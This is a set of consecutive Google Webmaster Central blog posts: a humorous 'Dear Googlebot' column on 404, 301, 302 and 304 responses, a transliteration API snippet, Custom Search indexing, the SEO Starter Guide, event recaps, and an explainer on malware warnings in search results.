[go: nahoru, domu]

Our date with Googlebot was so wonderful, but it's hard to tell if we, the websites, said the right thing. We returned 301 permanent redirect, but should we have responded with 302 temporary redirect (so he knows we're playing hard to get)? If we sent a few new 404s, will he ever call our site again? Should we support the header "If-Modified-Since?" These questions can be confusing, just like young love. So without further ado, let's ask the expert, Googlebot, and find out how he judged our response (code).


Supporting the "If-Modified-Since" header and returning 304 can save bandwidth.


-----------
Dearest Googlebot,
  Recently, I did some spring cleaning on my site and deleted a couple of old, orphaned pages. They now return the 404 "Page not found" code. Is this ok, or have I confused you?
Frankie O'Fore

Dear Frankie,
  404s are the standard way of telling me that a page no longer exists. I won't be upset—it's normal that old pages are pruned from websites, or updated to fresher content. Most websites will show a handful of 404s in the Crawl Diagnostics over at Webmaster Tools. It's really not a big deal. As long as you have good site architecture with links to all your indexable content, I'll be happy, because it means I can find everything I need.

  But don't forget, it's not just me who comes to your website—there may be humans seeing these pages too. If you've only got a very simple '404 page not found' message, visitors who aren't as savvy could be baffled. There are lots of ways to make your 404 page more friendly; a quick one is our 404 widget over at Webmaster Tools, which will help direct people to content which does exist. For more information, you can read the blog post. Most web hosting companies, big and small, will let you customise your 404 page (and other return codes too).

Love and kisses,
Googlebot


Hey Googlebot,
  I was just reading your reply to Frankie above, and it raised a couple of questions.
What if I have someone linking to a page that no longer exists? How can I make sure my visitors still find what they're after? Also, what if I just move some pages around? I'd like to better organise my site, but I'm worried you'll get confused. How can I help you?
Yours hopefully,
Little Jimmy


Hello Jimmy,
   Let's pretend there are no anachronisms in your letter, and get to the meat of the matter. Firstly, let's look at links coming from other sites. Obviously, these can be a great source of traffic, and you don't want visitors presented with an unfriendly 'Page not found' message. So, you can harness the power of the mighty redirect.

   There are two types of redirect—301 and 302. Actually, there are lots more, but these are the two we'll concern ourselves with now. Just like 404, 301 and 302 are different types of responses codes you can send to users and search engine crawlers. They're both redirects, but a 301 is permanent and a 302 is temporary. A 301 redirect tells me that whatever this page used to be, now it lives somewhere else. This is perfect for when you're re-organising your site, and also helps with links from offsite. Whenever I see a 301, I'll update all references to that old page with the new one you've told me about. Isn't that easy?

   If you don't know where to begin with redirects, let me get you started. It depends on your webserver, but here are some searches that may be helpful:
Apache: http://www.google.com/search?q=301+redirect+apache
IIS: http://www.google.com/search?q=301+redirect+iis
You can also check your manual, or the README files that came with your server.

   As an alternative to a redirect, you can email the webmaster of the site linking to you and ask them to update their link. Not sure what sites are linking to you? Don't despair - my human co-workers have made that easy to figure out. In the "Links" portion of Webmaster Tools, you can enter a specific URL on your site to determine who's linking to it.

  My human co-workers also just released a tool which shows URLs linking to non-existent pages on your site. You can read more about that here.

Yours informationally,
Googlebot



Darling Googlebot,
   I have a problem—I live in a very dynamic part of the web, and I keep changing my mind about things. When you ask me questions, I never respond the same way twice—my top threads change every hour, and I get new content all the time! You seem like a straightforward guy who wants straightforward answers. How can I tell you when things change without confusing you?
Temp O'Rary


Dear Temp,
   I just told little Jimmy that 301's are the best way to tell a Googlebot about your new address, but what you're looking for is a 302.
   Once you're indexed, it's the polite way to tell your visitors that your address is still the right one, but that the content can temporarily be found elsewhere. In these situations, a 302 (or the rarer '307 Temporary Redirect') would be better. For example, orkut redirects from http://orkut.com to http://google.com/accounts/login?service=orkut, which isn't a page that humans would find particularly useful when searching for Orkut***.
It's on a different domain, for starters. So, a 302 has been used to tell me that all the content and linking properties of the URL shouldn't be updated to the target - it's just a temporary page.

  That's why when you search for orkut, you see orkut.com and not that longer URL.

  Remember: simple communication is the key to any relationship.

Your friend,
Googlebot


*** Please note, I simplified the URL to make it easier to read. It's actually much more complex than that.

Captain Googlebot,
   I am the kind of site who likes to reinvent herself. I noticed that the links to me on my friends' sites are all to URLs I got rid of several redesigns ago! I had set up 301s to my new URLs for those pages, but after that I 301'ed the newer URLs to my next version. Now I'm afraid that if you follow their directions when you come to crawl, you'll end up following a string of 301s so long that by the end you won't come calling any more.
Ethel Binky


Dear Ethel,
   It sounds like you have set up some URLs that redirect to more redirects to... well, goodness! In small amounts, these "repeat redirects" are understandable, but it may be worth considering why you're using them in the first place. If you remove the 301s in the middle and send me straight to the final destination on all of them, you'll save the both of us a bunch of time and HTTP requests. But don't just think of us. Other people get tired of seeing that same old 'contacting.... loading ... contacting...' game in their status bar.

   Put yourself in their shoes—if your string of redirects starts to look rather long, users might fear that you have set them off into an infinite loop! Bots and humans alike can get scared by that kind of "eternal commitment." Instead, try to get rid of those chained redirects, or at least keep 'em short. Think of the humans!

Yours thoughtfully,
Googlebot


Dear Googlebot,
   I know you must like me—you even ask me for unmodified files, like my college thesis that hasn't changed in 10 years. It's starting to be a real hassle! Is there anything I can do to prevent your taking up my lovely bandwidth?

Janet Crinklenose


Janet, Janet, Janet,
   It sounds like you might want to learn a new phrase—'304 Not Modified'. If I've seen a URL before, I insert an 'If-Modified-Since' in my request's header. This line also includes an HTTP-formatted date string. If you don't want to send me yet another copy of that file, stand up for yourself and send back a normal HTTP header with the status '304 Not Modified'! I like information, and this qualifies too. When you do that, there's no need to send me a copy of the file—which means you don't waste your bandwidth, and I don't feel like you're palming me off with the same old stuff.

   You'll probably notice that a lot of browsers and proxies will say 'If-Modified-Since' in their headers, too. You can be well on your way to curbing that pesky bandwidth bill.

Now go out there and save some bandwidth!
Good ol' Googlebot

-----------

Googlebot has been so helpful! Now we know how to best respond to users and search engines. The next time we get together, though, it's time to sit down for a good long heart-to-heart with the guy (Date with Googlebot: Part III, is coming soon!).



UPDATE: Added a missing link. Thanks to Boris for pointing that out.

A lot has been said about how to start a multi-lingual site and how to better target content through meta tags. Our users have raised a number of interesting questions about creating websites in different languages, like the one below.

ganex':
> How does one do for INDIA.
> As there are many languages spoken here.
> My Site is primarily in English, but my site targets different cities in INDIA.
> For Hyderabad - I want in Urdu & Telugu and for Chennai I want in Tamil
> for Bengaluru I want in Kannada.
> For North I want in Hindi.’

We’d like to introduce the transliteration API for Indic languages (languages spoken in India) in addition to our Ajax API for languages. With this API at your disposal, content creation is simplified because it not only helps integrating transliteration in your websites but also allows users visiting your site to type in Indic languages.

To include the transliteration API, first you need the AJAX script.

<script type="text/javascript" src="http://www.google.com/jsapi"></>

This script tag will load the google.load function, which lets you load the individual Google APIs. For loading Google Transliteration API, call to google.load looks like this:

<script type="text/javascript">
google.load("elements", "1", {
packages: "transliteration"
});
</script>


When it comes to targeting, don't forget to add meta tags in your local language. And for your questions, we have a new addition to our already existing communication channels like the webmaster help groups and webmaster tools (available in 26 languages!). We also have our own official Orkut webmaster community! Here users can share thoughts and discuss webmaster related issues.

Sign up for our Orkut community now and if you have any additional thoughts we'd love to hear about them.

Cheers,

Since we launched enhanced indexing with the Custom Search platform earlier this year, webmasters who submit Sitemaps to Webmaster Tools get special treatment: Custom Search recognizes the submitted Sitemaps and indexes URLs from these Sitemaps into a separate index for higher quality Custom Search results. We analyze your Custom Search Engines (CSEs), pick up the appropriate Sitemaps, and figure out which URLs are relevant for your engines for enhanced indexing. You get the dual benefit of better discovery for Google.com and more comprehensive coverage in your own CSEs.

Today, we're taking another step towards improving your experience with Google webmaster services with the launch of On-Demand Indexing in Custom Search. With On-Demand Indexing, you can now tell us about the pages on your websites that are new, or that are important and have changed, and Custom Search will instantly schedule them for crawl, and index and serve them in your CSEs usually within 24 hours, often much faster.

How do you tell us about these URLs? You guessed it... provide a Sitemap to Webmaster Tools, like you always do, and tell Custom Search about it. Just go to the CSE control panel, click on the Indexing tab, select your On-Demand Sitemap, and hit the "Index Now" button. You can tell us which of these URLs are most important to you via the priority and lastmod attributes that you provide in your Sitemap. Each CSE has a number of pages allocated within the On-Demand Index, and with these attributes, you can us which are most important for indexing. If you need greater allocation in the On-Demand index, as well as more customization controls, Google Site Search provides a range of options.


Some important points to remember:
  1. You only need to submit your Sitemaps once in Webmaster Tools. Custom Search will automatically list the Sitemaps submitted via Webmaster Tools and you can decide which Sitemap to select for On-Demand Indexing.
  2. Your Sitemap needs to be for a website verified in Webmaster Tools, so that we can verify ownership of the right URLs.
  3. In order for us to index these additional pages, our crawlers must be able to crawl them. You can use "Webmaster Tools > Crawl Errors > URLs restricted by robots.txt" or check your robots.txt file to ensure that you're not blocking us from crawling these pages.
  4. Submitting pages for On-Demand Indexing will not make them appear any faster in the main Google index, or impact ranking on Google.com.
We hope you'll use this feature to inform us regularly of the most important changes on your sites, so we can respond quickly and get those pages indexed in your CSE. As always, we're always listening for your feedback on Custom Search.

Note: The SEO Starter Guide has since been updated.

Webmasters often ask us at conferences or in the Webmaster Help Group, "What are some simple ways that I can improve my website's performance in Google?" There are lots of possible answers to this question, and a wealth of search engine optimization information on the web, so much that it can be intimidating for newer webmasters or those unfamiliar with the topic. We thought it'd be useful to create a compact guide that lists some best practices that teams within Google and external webmasters alike can follow that could improve their sites' crawlability and indexing.

Our Search Engine Optimization Starter Guide covers around a dozen common areas that webmasters might consider optimizing. We felt that these areas (like improving title and description meta tags, URL structure, site navigation, content creation, anchor text, and more) would apply to webmasters of all experience levels and sites of all sizes and types. Throughout the guide, we also worked in many illustrations, pitfalls to avoid, and links to other resources that help expand our explanation of the topics. We plan on updating the guide at regular intervals with new optimization suggestions and to keep the technical advice current.

So, the next time we get the question, "I'm new to SEO, how do I improve my site?", we can say, "Well, here's a list of best practices that we use inside Google that you might want to check out."

Update on July 22, 2009: The SEO Starter Guide is now available in 40 languages!


hotdog

lion king
...and infinitely more fun: webmasters and their pets incognito! Happy Halloween, everyone! If you see any costumes that would pass the SafeSearch filter :), feel like sharing a gripe or telling a good story, please join the chat!

Take care, and don't forget to brush your teeth.
 Yours scarily,
  The Webmaster Central Team


Our glasses-wearing, no vampire-teeth vampire (Ryan), zoombie Mur, Holiday Fail (Tiffany Lane), Colbert Hipster (Dan Vanderkam), Rick Astley Cutts, Homeboy Ben D'Angelo, Me -- pinker & poofier, Investment Bank CEO Shyam Jayaraman (though you can't see the golden parachute in his backpack)



Chark as Juno, Wysz as Beah Burger (our co-worker), Adi and Matt Dougherty as yellow ninja, red ninja!


Heroes come in all shapes and sizes...

Powdered toast man, Mike Leotta

Adam Lasnik as, let me see if I get this right, a "secret service agent masquerading as a backstage tech" :)

What featured over 750 webmasters and a large number of Googlers from around the world, hundreds of questions, and over one hundred answers over the course of nearly two hours?  If you guessed "the Tricks and Treats webmaster event from this earlier this month!" well, you're either absolutely brilliant, you read the title of this post, or both!

How did it go?
It was an exhilarating, exhausting, and educational event, if we may say so ourselves, even though there were a few snafus.  We're aware that the sound quality wasn't great for some folks, and we've also appreciated quite-helpful constructive criticisms in this feedback thread.  Last but not least, we are bummed to admit that someone (whose name starts with 'A' and ends with 'M') uncharacteristically forgot to hit the record button (really!), so there's unfortunately no audio recording to share :-(.

But on more positive notes, we're delighted that so many of you enjoyed our presentations (embedded below), our many answers, and even some of our bad jokes (mercifully not to be repeated).

What next?
Well, for starters, all of us Webmaster Central Googlers will be spending quite some time taking in your feedback.  Some of you have requested sessions exclusively covering particular (pre-announced) topics or tailored to specific experience levels, and we've also heard from many webmasters outside of the U.S. who would love online events in other languages and at more convenient times.  No promises, but you can bet we're eager to please!  Stay tuned on this blog (and, as a hint and hallo to our German-speaking webmasters, do make sure to follow our German webmaster blog  ;-).  

And finally, a big thank you!
A heartfelt thank you to my fellow Googlers, many of whom got up at the crack of dawn to get to the office early for the chat and previous day's runthrough or stayed at work late in Europe.  But more importantly, major props to all of you (from New Delhi, New York, New Zealand and older places) who asked great questions and hung out with us online for up to two hours.  You webmasters are the reason we love coming to work each day, and we look forward to our next chat!

*  *  *

The presentations...
We had presentations from John, Jonathan, Maile, and Wysz.  Presentations from the first three are embedded below (Wysz didn't have a written presentation this time).


John's slides on "Frightening Webmastering Myths"


Jonathan's slides on "Using the Not Found errors report in Webmaster Tools"


Maile's slides on "Where We're Coming From"


Edited on Wednesday, October 29 at 6:00pm to update number of participants

(Cross-posted from the Google Online Security Blog.)

"This site may harm your computer"
You may have seen those words in Google search results — but what do they mean? If you click the search result link you get another warning page instead of the website you were expecting. But if the web page was your grandmother's baking blog, you're still confused. Surely your grandmother hasn't been secretly honing her l33t computer hacking skills at night school. Google must have made a mistake and your grandmother's web page is just fine...

I work with the team that helps put the warning in Google's search results, so let me try to explain. The good news is that your grandmother is still kind and loves turtles. She isn't trying to start a botnet or steal credit card numbers. The bad news is that her website or the server that it runs on probably has a security vulnerability, most likely from some out-of-date software. That vulnerability has been exploited and malicious code has been added to your grandmother's website. It's most likely an invisible script or iframe that pulls content from another website that tries to attack any computer that views the page. If the attack succeeds, then viruses, spyware, key loggers, botnets, and other nasty stuff will get installed.

If you see the warning on a site in Google's search results, it's a good idea to pay attention to it. Google has automatic scanners that are constantly looking for these sorts of web pages. I help build the scanners and continue to be surprised by how accurate they are. There is almost certainly something wrong with the website even if it is run by someone you trust. The automatic scanners make unbiased decisions based on the malicious content of the pages, not the reputation of the webmaster.

Servers are just like your home computer and need constant updating. There are lots of tools that make building a website easy, but each one adds some risk of being exploited. Even if you're diligent and keep all your website components updated, your web host may not be. They control your website's server and may not have installed the most recent OS patches. And it's not just innocent grandmothers that this happens to. There have been warnings on the websites of banks, sports teams, and corporate and government websites.

Uh-oh... I need help!
Now that we understand what the malware label means in search results, what do you do if you're a webmaster and Google's scanners have found malware on your site?

There are some resources to help clean things up. The Google Webmaster Central blog has some tips and a quick security checklist for webmasters. Stopbadware.org has great information, and their forums have a number of helpful and knowledgeable volunteers who may be able to help (sometimes I'm one of them). You can also use the Google SafeBrowsing diagnostics page for your site (http://www.google.com/safebrowsing/diagnostic?site=<site-name-here>) to see specific information about what Google's automatic scanners have found. If your site has been flagged, Google's Webmaster Tools lists some of the URLs that were scanned and found to be infected.

Once you've cleaned up your website, use Google's Webmaster Tools to request a malware review. The automatic systems will rescan your website and the warning will be removed if the malware is gone.

Advance warning
I often hear webmasters asking Google for advance warning before a malware label is put on their website. When the label is applied, Google usually emails the website owners and then posts a warning in Google's Webmaster Tools. But no warning is given ahead of time - before the label is applied - so a webmaster can't quickly clean up the site before a warning is applied.

But, look at the situation from the user's point of view. As a user, I'd be pretty annoyed if Google sent me to a site it knew was dangerous. Even a short delay would expose some users to that risk, and it doesn't seem justified. I know it's frustrating for a webmaster to see a malware label on their website. But, ultimately, protecting users against malware makes the internet a safer place and everyone benefits, both webmasters and users.

Google's Webmaster Tools has started a test to provide warnings to webmasters that their server software may be vulnerable. Responding to that warning and updating server software can prevent your website from being compromised with malware. The best way to avoid a malware label is to never have any malware on the site!

Reviews
You can request a review via Google's Webmaster Tools and you can see the status of the review there. If you think the review is taking too long, make sure to check the status. Finding all the malware on a site is difficult and the automated scanners are far more accurate than humans. The scanners may have found something you've missed and the review may have failed. If your site has a malware label, Google's Webmaster Tools will also list some sample URLs that have problems. This is not a full list of all of the problem URLs (because that's often very, very long), but it should get you started.

Finally, don't confuse a malware review with a request for reconsideration. If Google's automated scanners find malware on your website, the site will usually not be removed from search results. There is also a different process that removes spammy websites from Google search results. If that's happened and you disagree with Google, you should submit a reconsideration request. But if your site has a malware label, a reconsideration request won't do any good — for malware you need to file a malware review from the Overview page.

How long will a review take?
Webmasters are eager to have a Google malware label removed from their site and often ask how long a review of the site will take. Both the original scanning and the review process are fully automated. The systems analyze large portions of the internet, which is big place, so the review may not happen immediately. Ideally, the label will be removed within a few hours. At its longest, the process should take a day or so.